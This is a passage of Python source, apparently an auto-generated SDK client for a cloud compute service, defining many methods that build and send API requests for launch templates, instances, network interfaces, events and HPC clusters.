owner_account, "OwnerId": owner_id, "InstanceId": list_of_instance_id, "EventType": event_type} repeat_info = {"InstanceId": ('InstanceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def cancel_simulated_system_events( self, list_of_event_id=None, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('CancelSimulatedSystemEvents', 'GET', 'http', 'RPC', 'query') api_request._params = { "EventId": list_of_event_id, "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} repeat_info = {"EventId": ('EventId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_eni_monitor_data( self, resource_owner_id=None, start_time=None, region_id=None, period=None, resource_owner_account=None, owner_account=None, end_time=None, owner_id=None, instance_id=None, eni_id=None): api_request = APIRequest('DescribeEniMonitorData', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "StartTime": start_time, "RegionId": region_id, "Period": period, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "EndTime": end_time, "OwnerId": owner_id, "InstanceId": instance_id, "EniId": eni_id} return self._handle_request(api_request).result def describe_account_attributes( self, resource_owner_id=None, list_of_attribute_name=None, region_id=None, resource_owner_account=None, owner_id=None, zone_id=None): api_request = APIRequest('DescribeAccountAttributes', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "AttributeName": list_of_attribute_name, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerId": owner_id, "ZoneId": zone_id} repeat_info = {"AttributeName": ('AttributeName', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def modify_launch_template_default_version( self, launch_template_name=None, resource_owner_id=None, region_id=None, launch_template_id=None, resource_owner_account=None, owner_account=None, owner_id=None, default_version_number=None): api_request = APIRequest('ModifyLaunchTemplateDefaultVersion', 'GET', 'http', 'RPC', 'query') api_request._params = { "LaunchTemplateName": launch_template_name, "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "LaunchTemplateId": launch_template_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "DefaultVersionNumber": default_version_number} return self._handle_request(api_request).result def describe_launch_templates( self, list_of_launch_template_name=None, resource_owner_id=None, page_number=None, region_id=None, page_size=None, list_of_template_tag=None, list_of_launch_template_id=None, resource_owner_account=None, owner_account=None, template_resource_group_id=None, owner_id=None): api_request = APIRequest('DescribeLaunchTemplates', 'GET', 'http', 'RPC', 'query') api_request._params = { "LaunchTemplateName": list_of_launch_template_name, "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "TemplateTag": list_of_template_tag, "LaunchTemplateId": list_of_launch_template_id, "ResourceOwnerAccount": 
resource_owner_account, "OwnerAccount": owner_account, "TemplateResourceGroupId": template_resource_group_id, "OwnerId": owner_id} repeat_info = {"LaunchTemplateName": ('LaunchTemplateName', 'list', 'str', None), "TemplateTag": ('TemplateTag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), "LaunchTemplateId": ('LaunchTemplateId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_launch_template_versions( self, launch_template_name=None, max_version=None, resource_owner_id=None, default_version=None, min_version=None, page_number=None, region_id=None, page_size=None, launch_template_id=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_launch_template_version=None, detail_flag=None): api_request = APIRequest('DescribeLaunchTemplateVersions', 'GET', 'http', 'RPC', 'query') api_request._params = { "LaunchTemplateName": launch_template_name, "MaxVersion": max_version, "ResourceOwnerId": resource_owner_id, "DefaultVersion": default_version, "MinVersion": min_version, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "LaunchTemplateId": launch_template_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "LaunchTemplateVersion": list_of_launch_template_version, "DetailFlag": detail_flag} repeat_info = {"LaunchTemplateVersion": ('LaunchTemplateVersion', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def delete_launch_template_version( self, launch_template_name=None, resource_owner_id=None, list_of_delete_version=None, region_id=None, launch_template_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('DeleteLaunchTemplateVersion', 'GET', 'http', 'RPC', 'query') api_request._params = { "LaunchTemplateName": launch_template_name, "ResourceOwnerId": resource_owner_id, "DeleteVersion": list_of_delete_version, "RegionId": region_id, "LaunchTemplateId": launch_template_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} repeat_info = {"DeleteVersion": ('DeleteVersion', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def delete_launch_template( self, launch_template_name=None, resource_owner_id=None, region_id=None, launch_template_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('DeleteLaunchTemplate', 'GET', 'http', 'RPC', 'query') api_request._params = { "LaunchTemplateName": launch_template_name, "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "LaunchTemplateId": launch_template_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def create_launch_template_version( self, launch_template_name=None, resource_owner_id=None, security_enhancement_strategy=None, network_type=None, key_pair_name=None, spot_price_limit=None, image_owner_alias=None, resource_group_id=None, host_name=None, system_disk_iops=None, list_of_tag=None, period=None, launch_template_id=None, owner_id=None, vswitch_id=None, spot_strategy=None, instance_name=None, internet_charge_type=None, zone_id=None, internet_max_bandwidth_in=None, version_description=None, image_id=None, io_optimized=None, security_group_id=None, 
internet_max_bandwidth_out=None, description=None, system_disk_category=None, user_data=None, password_inherit=None, region_id=None, instance_type=None, instance_charge_type=None, enable_vm_os_config=None, list_of_network_interface=None, resource_owner_account=None, owner_account=None, system_disk_disk_name=None, ram_role_name=None, auto_release_time=None, spot_duration=None, list_of_data_disk=None, system_disk_size=None, vpc_id=None, system_disk_description=None): api_request = APIRequest('CreateLaunchTemplateVersion', 'GET', 'http', 'RPC', 'query') api_request._params = { "LaunchTemplateName": launch_template_name, "ResourceOwnerId": resource_owner_id, "SecurityEnhancementStrategy": security_enhancement_strategy, "NetworkType": network_type, "KeyPairName": key_pair_name, "SpotPriceLimit": spot_price_limit, "ImageOwnerAlias": image_owner_alias, "ResourceGroupId": resource_group_id, "HostName": host_name, "SystemDisk.Iops": system_disk_iops, "Tag": list_of_tag, "Period": period, "LaunchTemplateId": launch_template_id, "OwnerId": owner_id, "VSwitchId": vswitch_id, "SpotStrategy": spot_strategy, "InstanceName": instance_name, "InternetChargeType": internet_charge_type, "ZoneId": zone_id, "InternetMaxBandwidthIn": internet_max_bandwidth_in, "VersionDescription": version_description, "ImageId": image_id, "IoOptimized": io_optimized, "SecurityGroupId": security_group_id, "InternetMaxBandwidthOut": internet_max_bandwidth_out, "Description": description, "SystemDisk.Category": system_disk_category, "UserData": user_data, "PasswordInherit": password_inherit, "RegionId": region_id, "InstanceType": instance_type, "InstanceChargeType": instance_charge_type, "EnableVmOsConfig": enable_vm_os_config, "NetworkInterface": list_of_network_interface, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "SystemDisk.DiskName": system_disk_disk_name, "RamRoleName": ram_role_name, "AutoReleaseTime": auto_release_time, "SpotDuration": spot_duration, "DataDisk": list_of_data_disk, "SystemDisk.Size": system_disk_size, "VpcId": vpc_id, "SystemDisk.Description": system_disk_description} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), "NetworkInterface": ('NetworkInterface', 'list', 'dict', [('PrimaryIpAddress', 'str', None, None), ('VSwitchId', 'str', None, None), ('SecurityGroupId', 'str', None, None), ('NetworkInterfaceName', 'str', None, None), ('Description', 'str', None, None), ]), "DataDisk": ('DataDisk', 'list', 'dict', [('Size', 'str', None, None), ('SnapshotId', 'str', None, None), ('Category', 'str', None, None), ('Encrypted', 'str', None, None), ('DiskName', 'str', None, None), ('Description', 'str', None, None), ('DeleteWithInstance', 'str', None, None), ('Device', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def create_launch_template( self, launch_template_name=None, resource_owner_id=None, security_enhancement_strategy=None, network_type=None, key_pair_name=None, spot_price_limit=None, image_owner_alias=None, resource_group_id=None, host_name=None, system_disk_iops=None, list_of_template_tag=None, list_of_tag=None, period=None, template_resource_group_id=None, owner_id=None, vswitch_id=None, spot_strategy=None, instance_name=None, internet_charge_type=None, zone_id=None, internet_max_bandwidth_in=None, version_description=None, image_id=None, io_optimized=None, security_group_id=None, internet_max_bandwidth_out=None, description=None, 
system_disk_category=None, user_data=None, password_inherit=None, region_id=None, instance_type=None, instance_charge_type=None, enable_vm_os_config=None, list_of_network_interface=None, resource_owner_account=None, owner_account=None, system_disk_disk_name=None, ram_role_name=None, auto_release_time=None, spot_duration=None, list_of_data_disk=None, system_disk_size=None, vpc_id=None, system_disk_description=None): api_request = APIRequest('CreateLaunchTemplate', 'GET', 'http', 'RPC', 'query') api_request._params = { "LaunchTemplateName": launch_template_name, "ResourceOwnerId": resource_owner_id, "SecurityEnhancementStrategy": security_enhancement_strategy, "NetworkType": network_type, "KeyPairName": key_pair_name, "SpotPriceLimit": spot_price_limit, "ImageOwnerAlias": image_owner_alias, "ResourceGroupId": resource_group_id, "HostName": host_name, "SystemDisk.Iops": system_disk_iops, "TemplateTag": list_of_template_tag, "Tag": list_of_tag, "Period": period, "TemplateResourceGroupId": template_resource_group_id, "OwnerId": owner_id, "VSwitchId": vswitch_id, "SpotStrategy": spot_strategy, "InstanceName": instance_name, "InternetChargeType": internet_charge_type, "ZoneId": zone_id, "InternetMaxBandwidthIn": internet_max_bandwidth_in, "VersionDescription": version_description, "ImageId": image_id, "IoOptimized": io_optimized, "SecurityGroupId": security_group_id, "InternetMaxBandwidthOut": internet_max_bandwidth_out, "Description": description, "SystemDisk.Category": system_disk_category, "UserData": user_data, "PasswordInherit": password_inherit, "RegionId": region_id, "InstanceType": instance_type, "InstanceChargeType": instance_charge_type, "EnableVmOsConfig": enable_vm_os_config, "NetworkInterface": list_of_network_interface, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "SystemDisk.DiskName": system_disk_disk_name, "RamRoleName": ram_role_name, "AutoReleaseTime": auto_release_time, "SpotDuration": spot_duration, "DataDisk": list_of_data_disk, "SystemDisk.Size": system_disk_size, "VpcId": vpc_id, "SystemDisk.Description": system_disk_description} repeat_info = {"TemplateTag": ('TemplateTag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), "Tag": ('Tag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), "NetworkInterface": ('NetworkInterface', 'list', 'dict', [('PrimaryIpAddress', 'str', None, None), ('VSwitchId', 'str', None, None), ('SecurityGroupId', 'str', None, None), ('NetworkInterfaceName', 'str', None, None), ('Description', 'str', None, None), ]), "DataDisk": ('DataDisk', 'list', 'dict', [('Size', 'str', None, None), ('SnapshotId', 'str', None, None), ('Category', 'str', None, None), ('Encrypted', 'str', None, None), ('DiskName', 'str', None, None), ('Description', 'str', None, None), ('DeleteWithInstance', 'str', None, None), ('Device', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def install_cloud_assistant( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_instance_id=None): api_request = APIRequest('InstallCloudAssistant', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": list_of_instance_id} repeat_info = {"InstanceId": ('InstanceId', 'list', 'str', None), } 
verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_cloud_assistant_status( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_instance_id=None): api_request = APIRequest('DescribeCloudAssistantStatus', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": list_of_instance_id} repeat_info = {"InstanceId": ('InstanceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def unassign_private_ip_addresses( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_private_ip_address=None, network_interface_id=None): api_request = APIRequest('UnassignPrivateIpAddresses', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "PrivateIpAddress": list_of_private_ip_address, "NetworkInterfaceId": network_interface_id} repeat_info = {"PrivateIpAddress": ('PrivateIpAddress', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def assign_private_ip_addresses( self, resource_owner_id=None, secondary_private_ip_address_count=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_private_ip_address=None, network_interface_id=None): api_request = APIRequest('AssignPrivateIpAddresses', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "SecondaryPrivateIpAddressCount": secondary_private_ip_address_count, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "PrivateIpAddress": list_of_private_ip_address, "NetworkInterfaceId": network_interface_id} repeat_info = {"PrivateIpAddress": ('PrivateIpAddress', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_network_interface_permissions( self, resource_owner_id=None, page_number=None, region_id=None, page_size=None, list_of_network_interface_permission_id=None, resource_owner_account=None, owner_account=None, owner_id=None, network_interface_id=None): api_request = APIRequest('DescribeNetworkInterfacePermissions', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "NetworkInterfacePermissionId": list_of_network_interface_permission_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "NetworkInterfaceId": network_interface_id} repeat_info = { "NetworkInterfacePermissionId": ( 'NetworkInterfacePermissionId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def delete_network_interface_permission( self, resource_owner_id=None, region_id=None, network_interface_permission_id=None, resource_owner_account=None, owner_account=None, owner_id=None, force=None): api_request = APIRequest('DeleteNetworkInterfacePermission', 'GET', 'http', 'RPC', 'query') 
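        # Each method builds an APIRequest whose positional arguments appear to be the
        # action name, HTTP method, scheme, API style ('RPC'), and where the parameters
        # are carried ('query'); the populated _params dict is then sent through
        # self._handle_request() and the parsed result is returned.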
api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "NetworkInterfacePermissionId": network_interface_permission_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "Force": force} return self._handle_request(api_request).result def create_network_interface_permission( self, resource_owner_id=None, account_id=None, region_id=None, resource_owner_account=None, owner_account=None, permission=None, owner_id=None, network_interface_id=None): api_request = APIRequest('CreateNetworkInterfacePermission', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "AccountId": account_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Permission": permission, "OwnerId": owner_id, "NetworkInterfaceId": network_interface_id} return self._handle_request(api_request).result def get_instance_screenshot( self, resource_owner_id=None, region_id=None, resource_owner_account=None, wake_up=None, owner_account=None, owner_id=None, instance_id=None): api_request = APIRequest('GetInstanceScreenshot', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "WakeUp": wake_up, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": instance_id} return self._handle_request(api_request).result def get_instance_console_output( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, instance_id=None): api_request = APIRequest('GetInstanceConsoleOutput', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": instance_id} return self._handle_request(api_request).result def describe_resources_modification( self, resource_owner_id=None, memory=None, cores=None, region_id=None, migrate_across_zone=None, instance_type=None, resource_id=None, resource_owner_account=None, owner_account=None, operation_type=None, owner_id=None, destination_resource=None): api_request = APIRequest('DescribeResourcesModification', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Memory": memory, "Cores": cores, "RegionId": region_id, "MigrateAcrossZone": migrate_across_zone, "InstanceType": instance_type, "ResourceId": resource_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OperationType": operation_type, "OwnerId": owner_id, "DestinationResource": destination_resource} return self._handle_request(api_request).result def describe_bandwidth_limitation( self, resource_owner_id=None, region_id=None, instance_type=None, instance_charge_type=None, resource_id=None, resource_owner_account=None, owner_account=None, operation_type=None, owner_id=None, spot_strategy=None): api_request = APIRequest('DescribeBandwidthLimitation', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "InstanceType": instance_type, "InstanceChargeType": instance_charge_type, "ResourceId": resource_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OperationType": operation_type, "OwnerId": owner_id, "SpotStrategy": spot_strategy} return self._handle_request(api_request).result def 
describe_available_resource( self, resource_owner_id=None, memory=None, io_optimized=None, data_disk_category=None, cores=None, region_id=None, system_disk_category=None, scope=None, instance_type=None, network_category=None, instance_charge_type=None, resource_owner_account=None, owner_account=None, dedicated_host_id=None, owner_id=None, resource_type=None, spot_strategy=None, destination_resource=None, zone_id=None): api_request = APIRequest('DescribeAvailableResource', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Memory": memory, "IoOptimized": io_optimized, "DataDiskCategory": data_disk_category, "Cores": cores, "RegionId": region_id, "SystemDiskCategory": system_disk_category, "Scope": scope, "InstanceType": instance_type, "NetworkCategory": network_category, "InstanceChargeType": instance_charge_type, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "DedicatedHostId": dedicated_host_id, "OwnerId": owner_id, "ResourceType": resource_type, "SpotStrategy": spot_strategy, "DestinationResource": destination_resource, "ZoneId": zone_id} return self._handle_request(api_request).result def reactivate_instances( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('ReActivateInstances', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_instances_full_status( self, list_of_event_id=None, resource_owner_id=None, page_number=None, region_id=None, page_size=None, event_publish_time_end=None, list_of_instance_event_type=None, resource_owner_account=None, owner_account=None, not_before_start=None, owner_id=None, event_publish_time_start=None, list_of_instance_id=None, not_before_end=None, health_status=None, event_type=None, status=None): api_request = APIRequest('DescribeInstancesFullStatus', 'GET', 'http', 'RPC', 'query') api_request._params = { "EventId": list_of_event_id, "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "EventPublishTime.End": event_publish_time_end, "InstanceEventType": list_of_instance_event_type, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "NotBefore.Start": not_before_start, "OwnerId": owner_id, "EventPublishTime.Start": event_publish_time_start, "InstanceId": list_of_instance_id, "NotBefore.End": not_before_end, "HealthStatus": health_status, "EventType": event_type, "Status": status} repeat_info = {"EventId": ('EventId', 'list', 'str', None), "InstanceEventType": ('InstanceEventType', 'list', 'str', None), "InstanceId": ('InstanceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_instance_history_events( self, list_of_event_id=None, resource_owner_id=None, event_cycle_status=None, page_number=None, region_id=None, page_size=None, list_of_instance_event_cycle_status=None, event_publish_time_end=None, list_of_instance_event_type=None, resource_owner_account=None, owner_account=None, not_before_start=None, owner_id=None, event_publish_time_start=None, instance_id=None, not_before_end=None, event_type=None): api_request = APIRequest('DescribeInstanceHistoryEvents', 
'GET', 'http', 'RPC', 'query') api_request._params = { "EventId": list_of_event_id, "ResourceOwnerId": resource_owner_id, "EventCycleStatus": event_cycle_status, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "InstanceEventCycleStatus": list_of_instance_event_cycle_status, "EventPublishTime.End": event_publish_time_end, "InstanceEventType": list_of_instance_event_type, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "NotBefore.Start": not_before_start, "OwnerId": owner_id, "EventPublishTime.Start": event_publish_time_start, "InstanceId": instance_id, "NotBefore.End": not_before_end, "EventType": event_type} repeat_info = { "EventId": ( 'EventId', 'list', 'str', None), "InstanceEventCycleStatus": ( 'InstanceEventCycleStatus', 'list', 'str', None), "InstanceEventType": ( 'InstanceEventType', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_disks_full_status( self, list_of_event_id=None, resource_owner_id=None, page_number=None, event_time_start=None, region_id=None, page_size=None, list_of_disk_id=None, resource_owner_account=None, owner_account=None, owner_id=None, event_time_end=None, health_status=None, event_type=None, status=None): api_request = APIRequest('DescribeDisksFullStatus', 'GET', 'http', 'RPC', 'query') api_request._params = { "EventId": list_of_event_id, "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "EventTime.Start": event_time_start, "RegionId": region_id, "PageSize": page_size, "DiskId": list_of_disk_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "EventTime.End": event_time_end, "HealthStatus": health_status, "EventType": event_type, "Status": status} repeat_info = {"EventId": ('EventId', 'list', 'str', None), "DiskId": ('DiskId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def modify_user_business_behavior( self, resource_owner_id=None, region_id=None, status_value=None, resource_owner_account=None, owner_account=None, owner_id=None, status_key=None): api_request = APIRequest('ModifyUserBusinessBehavior', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "statusValue": status_value, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "statusKey": status_key} return self._handle_request(api_request).result def describe_user_business_behavior( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, status_key=None): api_request = APIRequest('DescribeUserBusinessBehavior', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "statusKey": status_key} return self._handle_request(api_request).result def run_instances( self, launch_template_name=None, resource_owner_id=None, unique_suffix=None, hpc_cluster_id=None, security_enhancement_strategy=None, key_pair_name=None, min_amount=None, spot_price_limit=None, deletion_protection=None, resource_group_id=None, host_name=None, password=None, storage_set_partition_number=None, list_of_tag=None, auto_renew_period=None, period=None, dry_run=None, launch_template_id=None, ipv6_address_count=None, owner_id=None, 
capacity_reservation_preference=None, vswitch_id=None, spot_strategy=None, private_ip_address=None, period_unit=None, instance_name=None, auto_renew=None, internet_charge_type=None, zone_id=None, list_of_ipv6_address=None, internet_max_bandwidth_in=None, affinity=None, image_id=None, spot_interruption_behavior=None, client_token=None, io_optimized=None, security_group_id=None, internet_max_bandwidth_out=None, description=None, system_disk_category=None, capacity_reservation_id=None, system_disk_performance_level=None, user_data=None, password_inherit=None, region_id=None, instance_type=None, hibernation_configured=None, instance_charge_type=None, list_of_network_interface=None, deployment_set_id=None, amount=None, resource_owner_account=None, owner_account=None, tenancy=None, system_disk_disk_name=None, ram_role_name=None, auto_release_time=None, dedicated_host_id=None, credit_specification=None, list_of_security_group_ids=None, list_of_data_disk=None, launch_template_version=None, storage_set_id=None, system_disk_size=None, system_disk_description=None): api_request = APIRequest('RunInstances', 'GET', 'http', 'RPC', 'query') api_request._params = { "LaunchTemplateName": launch_template_name, "ResourceOwnerId": resource_owner_id, "UniqueSuffix": unique_suffix, "HpcClusterId": hpc_cluster_id, "SecurityEnhancementStrategy": security_enhancement_strategy, "KeyPairName": key_pair_name, "MinAmount": min_amount, "SpotPriceLimit": spot_price_limit, "DeletionProtection": deletion_protection, "ResourceGroupId": resource_group_id, "HostName": host_name, "Password": password, "StorageSetPartitionNumber": storage_set_partition_number, "Tag": list_of_tag, "AutoRenewPeriod": auto_renew_period, "Period": period, "DryRun": dry_run, "LaunchTemplateId": launch_template_id, "Ipv6AddressCount": ipv6_address_count, "OwnerId": owner_id, "CapacityReservationPreference": capacity_reservation_preference, "VSwitchId": vswitch_id, "SpotStrategy": spot_strategy, "PrivateIpAddress": private_ip_address, "PeriodUnit": period_unit, "InstanceName": instance_name, "AutoRenew": auto_renew, "InternetChargeType": internet_charge_type, "ZoneId": zone_id, "Ipv6Address": list_of_ipv6_address, "InternetMaxBandwidthIn": internet_max_bandwidth_in, "Affinity": affinity, "ImageId": image_id, "SpotInterruptionBehavior": spot_interruption_behavior, "ClientToken": client_token, "IoOptimized": io_optimized, "SecurityGroupId": security_group_id, "InternetMaxBandwidthOut": internet_max_bandwidth_out, "Description": description, "SystemDisk.Category": system_disk_category, "CapacityReservationId": capacity_reservation_id, "SystemDisk.PerformanceLevel": system_disk_performance_level, "UserData": user_data, "PasswordInherit": password_inherit, "RegionId": region_id, "InstanceType": instance_type, "HibernationConfigured": hibernation_configured, "InstanceChargeType": instance_charge_type, "NetworkInterface": list_of_network_interface, "DeploymentSetId": deployment_set_id, "Amount": amount, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Tenancy": tenancy, "SystemDisk.DiskName": system_disk_disk_name, "RamRoleName": ram_role_name, "AutoReleaseTime": auto_release_time, "DedicatedHostId": dedicated_host_id, "CreditSpecification": credit_specification, "SecurityGroupIds": list_of_security_group_ids, "DataDisk": list_of_data_disk, "LaunchTemplateVersion": launch_template_version, "StorageSetId": storage_set_id, "SystemDisk.Size": system_disk_size, "SystemDisk.Description": system_disk_description} repeat_info = {"Tag": 
('Tag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), "Ipv6Address": ('Ipv6Address', 'list', 'str', None), "NetworkInterface": ('NetworkInterface', 'list', 'dict', [('PrimaryIpAddress', 'str', None, None), ('VSwitchId', 'str', None, None), ('SecurityGroupId', 'str', None, None), ('NetworkInterfaceName', 'str', None, None), ('Description', 'str', None, None), ]), "SecurityGroupIds": ('SecurityGroupIds', 'list', 'str', None), "DataDisk": ('DataDisk', 'list', 'dict', [('Size', 'str', None, None), ('SnapshotId', 'str', None, None), ('Category', 'str', None, None), ('Encrypted', 'str', None, None), ('KMSKeyId', 'str', None, None), ('DiskName', 'str', None, None), ('Description', 'str', None, None), ('Device', 'str', None, None), ('DeleteWithInstance', 'str', None, None), ('PerformanceLevel', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def convert_nat_public_ip_to_eip( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_id=None, instance_id=None): api_request = APIRequest('ConvertNatPublicIpToEip', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerId": owner_id, "InstanceId": instance_id} return self._handle_request(api_request).result def modify_hpc_cluster_attribute( self, resource_owner_id=None, hpc_cluster_id=None, client_token=None, description=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, name=None): api_request = APIRequest('ModifyHpcClusterAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "HpcClusterId": hpc_cluster_id, "ClientToken": client_token, "Description": description, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "Name": name} return self._handle_request(api_request).result def describe_hpc_clusters( self, resource_owner_id=None, client_token=None, page_number=None, region_id=None, page_size=None, resource_owner_account=None, owner_account=None, owner_id=None, hpc_cluster_ids=None): api_request = APIRequest('DescribeHpcClusters', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "HpcClusterIds": hpc_cluster_ids} return self._handle_request(api_request).result def delete_hpc_cluster( self, resource_owner_id=None, hpc_cluster_id=None, client_token=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('DeleteHpcCluster', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "HpcClusterId": hpc_cluster_id, "ClientToken": client_token, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def create_hpc_cluster( self, resource_owner_id=None, client_token=None, description=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, 